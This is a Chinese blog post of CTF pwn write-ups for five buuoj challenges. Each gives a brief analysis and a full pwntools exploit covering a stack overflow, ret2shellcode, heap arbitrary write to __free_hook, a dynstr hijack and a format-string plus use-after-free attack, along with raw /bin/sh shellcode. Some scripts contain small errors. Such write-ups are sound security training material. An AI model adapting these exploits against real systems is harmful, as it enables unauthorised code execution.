buuoj Pwn writeup 236-240

最新推荐文章于 2022-07-04 22:57:08 发布
最新推荐文章于 2022-07-04 22:57:08 发布
阅读量454 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/119415959
版权

236 qctf_2018_dice_game

在这里插入图片描述在这里插入图片描述逻辑也是比较的简单。

有个随机数,在栈上,有个栈溢出,答对五十次就可以了。

但是我们可以直接覆盖种子
种子也覆盖成0.这样我们就可以知道第一个数是多少了。

溢出一下就可以了。

exp

#-*- coding:utf-8 -*-
from pwn import*
from ctypes import*

context.log_level="debug"

r=remote("node4.buuoj.cn","27598")

lib = cdll.LoadLibrary('libc.so.6')

r.recvuntil("name:")       
payload='A' * 0x40 + p64(0)
payload=payload.ljust(0x50,"C")
r.sendline(payload)
for i in range(50):
    r.sendlineafter("point(1~6): ",str(lib.rand() % 6 + 1))
    
r.interactive()

237 actf_2019_anotherrepeater

在这里插入图片描述
在这里插入图片描述有栈溢出,保护啥的也都没开,ret2shellcode就好了。

exp

from pwn import *

r = remote("node4.buuoj.cn",26228)

r.recv()
r.sendline(str(-10))

buf=int(r.recv(8),16)

r.recv()
payload=asm(shellcraft.sh()).ljust(0x41b+0x4,'A')+p32(buf)

r.sendline(payload)

r.interactive()

238 hfctf_2020_sucurebox

在这里插入图片描述在这里插入图片描述

然后,我们用IDA分析一下,在add功能里,size的判断不准确,导致size可以很大,使得malloc(size)返回0,但是没有检查malloc的返回值。

edit功能里可以指定offset和len,这样,我们就能在整个内存里进行读写了。

exp

from pwn import*

r = process("./239")
libc = ELF("./libc.so.6")

def add(size):
   r.sendlineafter('5.Exit','1')
   r.sendlineafter('Size:',str(size))
   r.recvuntil('Key:')
   r.recvuntil('\n')
   strs = sh.recvuntil('\n',drop = True).strip().split(' ')
   data = []
   for x in strs:
      if x == '':
         continue
      data.append(int(x,16))
   return data
 
def delete(index):
   r.sendlineafter('5.Exit','2')
   r.sendlineafter('Box ID:',str(index))
 
def enc(index,off,len,msg):
   r.sendlineafter('5.Exit','3')
   r.sendlineafter('Box ID:',str(index))
   r.sendlineafter('Offset of msg:',str(off))
   r.sendlineafter('Len of msg:',str(len))
   r.sendafter('Msg:',msg)
 
def show(index,off,len):
   r.sendlineafter('5.Exit','4')
   r.sendlineafter('Box ID:',str(index))
   r.sendlineafter('Offset of msg:',str(off))
   r.sendlineafter('Len of msg:',str(len))
 
def tranLong(data):
   if data & 0x8000000000000000 != 0:
      return data - 0x10000000000000000
   else:
      return data
 
for i in range(8):
   add(0x200)
for i in range(1,8):
   delete(i)
delete(0)
key = add(0x200) #0
data = '/bin/sh\x00'
ans = ''
for i in range(8):
   ans += p8(ord(data[i]) ^ key[i])
enc(0,0,0x8,ans)
 
for i in range(7):
   add(0x200)
 
show(7,0x8,0x8)
r.recvuntil('Msg:')
r.recvuntil('\n')
malloc_hook = (u64(r.recvuntil('\x7f')[-6:].ljust(8, "\x00")) & 0xFFFFFFFFFFFFF000) + (libc.sym['__malloc_hook'] & 0xFFF)
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym["__free_hook"]
system_addr = libc_base + libc.sym["system"]
print "libc_base = " + hex(libc_base)

key = add(tranLong(0xFFFFFFFF00000FFF))
data = p64(system_addr)
ans = ''
for i in range(8):
   ans += p8(ord(data[i]) ^ key[i])
enc(8,tranLong(free_hook),8,ans)
#getshell
delete(0)
 
r.interactive()

239 rctf2018_rnote4

在这里插入图片描述PIE没开,RELRO没开。

在这里插入图片描述
三个功能,一点字没有。

功能1
在这里插入图片描述看得出来是add。

功能2
在这里插入图片描述是edit,长度自由控制,溢出了。

free
在这里插入图片描述free 指针清空掉了。

问题的关键在于,一点输出没有。
针对这种问题,以往的无论是攻击IO_FILE啊啥的做法就都失效了。

我们注意到RELRO是没有开启的,那么LOAD段是可以修改的。
那么其dt_strtab是可以修改的。

这个dt_strtab是干嘛的。我们回忆一下ret2dl。
在这里插入图片描述图是别的地方偷的,我们找到.dynstr。
它可以直接影响我们最后找到的函数,那么比如我们要找free,最后查表得函数名得时候正来了个system,那不就相当于劫持了free函数嘛……

然后就有了。

exp参考了hav1k大佬。

#coding:utf8
from pwn import *
 

r = remote('node4.buuoj.cn',25926)

elf = ELF('./239')

free_got = elf.got['free']
free_got_ld = 0x400626

fake_dynstr_addr = 0x6020D0 + 0x100
fake_dynstr = '\x00'*0x5F + 'system\x00'
fake_dynstr = fake_dynstr.ljust(0x73,'\x00')
fake_dynstr += 'GLIBC_2.4\x00GLIBC_2.2.5\x00'
dt_strtab = 0x601EB0
 
def add(size,content):
   r.send("1")
   r.send(str(size))
   r.send(content)
 
def edit(index,size,content):
   r.send("2")
   r.send(str(index))
   r.send(str(size))
   r.send(content)
 
def delete(index):
   r.send("3")
   r.send(str(index))
 
add(0x20,'a'*0x20) #0
add(0x80,'b'*0x80) #1
add(0x20,'/bin/sh\x00'.ljust(0x20,'\x00')) #2
 
payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(fake_dynstr_addr)
edit(0,0x40,payload)
#伪造dynstr
edit(1,len(fake_dynstr),fake_dynstr)
 
payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(dt_strtab)
edit(0,0x40,payload)
#修改dynstr指针
edit(1,0x8,p64(fake_dynstr_addr))
 
payload = 'a'*0x20 + p64(0) + p64(0x21) + p64(0x80) + p64(free_got)
edit(0,0x40,payload)
#修改dynstr指针
edit(1,0x8,p64(free_got_ld))

delete(2)
 
r.interactive()

240 pwnable_echo2

在这里插入图片描述在这里插入图片描述
先是一堆初始化。

echo2是一个格式化字符串
在这里插入图片描述

echo3是一个uaf。
在这里插入图片描述向v7变量覆盖shellcode,使用prinf的漏洞leak处栈地址然后计算处v6的地址,之后利用uaf漏洞跳转到v6执行。

exp

from pwn import *

r = process("./240")
        
    
    shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
    
    
r.recvuntil(' : ')
r.sendline(shellcode)
r.recvuntil('> ')
r.sendline('2')
r.recvuntil('\n')
r.sendline('%10$016lx') # get rbp addr
    
rbp_addr = int(r.recv(16),16)
v6_addr = rbp_addr-0x20
    
r.recvuntil('> ')
r.sendline('4')
r.recvuntil('(y/n)')
r.sendline('n\n3\n'+'a'*24+p64(v6_addr))
    
r.recvuntil('> ')
r.sendline('3')
r.interactive()
yongbaoii
关注
专栏目录
BUUCTF:[Black Watch 入群题]PWNwrite up)
qq_44768749的博客
08-23 940
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 446
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 526
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 298
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3237
前言 开始刷一刷Buuctf的PWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 397
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 422
Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp
初学pwn-BUUCTF(ciscn_2019_n_1)
天柱的博客
08-31 658
初学pwn-writeUp BUUCTF的第四道题,ciscn-2019_n_1。 首先还是链接远端查看一下。 这里提示让猜一个数字,然后他告诉我们,这个数字应该是11.28125。这就有点掩耳盗铃了呀,但是输入了11.28125,还是在说应该输入11.28125。可能是有点问题,ida打开查看一下。 可以看到主函数里,调用了三个函数,前两个都是set某个值,我们直接看func函数。 那这就很明显了,刚刚输入的值赋给了v1,但是这里是要让v2的值等于11.28125才可以。查看一下地址。 嗯,跟想象
初学pwn-BUUCTF(rip)
天柱的博客
08-30 2596
初学pwn-writeUp BUUCTF平台的一道题目,rip。 与之前同样的步骤,启动靶机,链接远端 发现这里提示输入一些内容,但是输入完成之后,这里就结束了。还是要打开文件查看一下。 看到这里,只有一个输入的过程可以操作,那就很清楚了,就是要栈溢出了。点进去看一下。 可以看到这里s这个数组是15个字节,到r这个返回值还需要8个字节。不过这里要注意的一点是,这个15是十进制的,不能像之前再在数字之前加0x标记十六进制,这里可以直接写十进制。 摁shift+f12,可以看到这时还有什么地址可能会用到,
初学pwn-攻防世界(level0)
天柱的博客
08-27 1041
初学pwn-writeUp 攻防世界的第三道题目,level0。 首先还是先创建场景,使用nc进入远端,发现输出了一个Hello,World,之后什么都没有了,使用ls也没有反应,说明这需要我们获取shell了。 下载文件,先用checksec查看一下 这里简单介绍一些checksec这个工具: 1、Relro:No Relro(重定位表只读)   Relocation Read Only, 重定位表只读。重定位表即.got 和 .plt 两个表。   RELRO会有No RELRO、Partial RE
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 284
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 251
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1160
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf-pwn write-ups (9)
CoLin的pwn小屋
07-04 249
buuctf-pwn 067~072题题解
[PWN] BUUCTF not_the_same_3dsctf_2016 1 Writeup
Csome
05-21 568
解题 checksec 先checksec一下,发现没有开canary方便了栈溢出,PIE也没开 反编译 IDA反编译 main函数 get_secret函数 分析利用 程序先进入main函数,有一个gets(无限长度的栈溢出) get_secret函数是将flag.txt读入bss段中,并没有做输出的操作 思路:,在main函数中修改main函数的返回地址,返回到get_secret函数中,读取flag,再返回到mian函数中(第二次进入main函数),修改返回地址为printf的地址,传入flag
buuctf [第五空间2019 决赛]PWN5 writeup
yajuanpi4899的博客
01-16 2040
一、题目速阅 拿到题目,进行check 得到信息,可知开启了金丝雀,32位 IDA进行反编译: 题目分析:该题逻辑是将dword_804C044中值与第二次输入的passwd进行校对,如果相等则执行system("/bin/sh"),确认payload目标:使第二次值相等,而可以看到printf中有格式化字符串,根据此构建payload。 二、知识要点 格式化字符串漏洞: 利用常用方式检索字符在栈上偏移量: 如图所示,41414141即AAAA,可以看到距离AAAA偏移10位 可..
PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 687
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
[BUUCTF-pwn]——x_ctf_b0verfl0w
Y_peak的博客
03-27 627
[BUUCTF-pwn]——x_ctf_b0verfl0w 很简单的一个ret2libc题型,利用栈溢出,构造循环调用 第一次leek地址,之后就可以构造我们想要的rop链了 exploit from pwn import * from LibcSearcher import * #p = process('./b0verfl0w') p = remote('node3.buuoj.cn',26806) elf = ELF('./b0verfl0w') context.log_level = 'debug
[BUUCTF-pwn]——pwnable_orw   (ORW)
Y_peak的博客
03-16 1223
[BUUCTF-pwn]——pwnable_orw 第一次碰到orw的问题,所谓orw就是指你的系统调用被禁止了,不能通过子进程去获得权限和flag,只能在该进程通过 open , read ,write来得到flag 这个时候可以通过seccomptools,来查看 注意看到prctl就是将系统调用给你禁止了 exploit from pwn import * context.arch = 'i386' p = remote('node3.buuoj.cn',28626) shellcode = she
攻防世界pwn-forgot
最新发布
08-10
很抱歉,但是我无法回答你的问题。我只能提供关于麦田怪圈的信息。123 #### 引用[.reference_title] - *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot](https://blog.csdn.net/m0_53932372/article/details/122244244)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值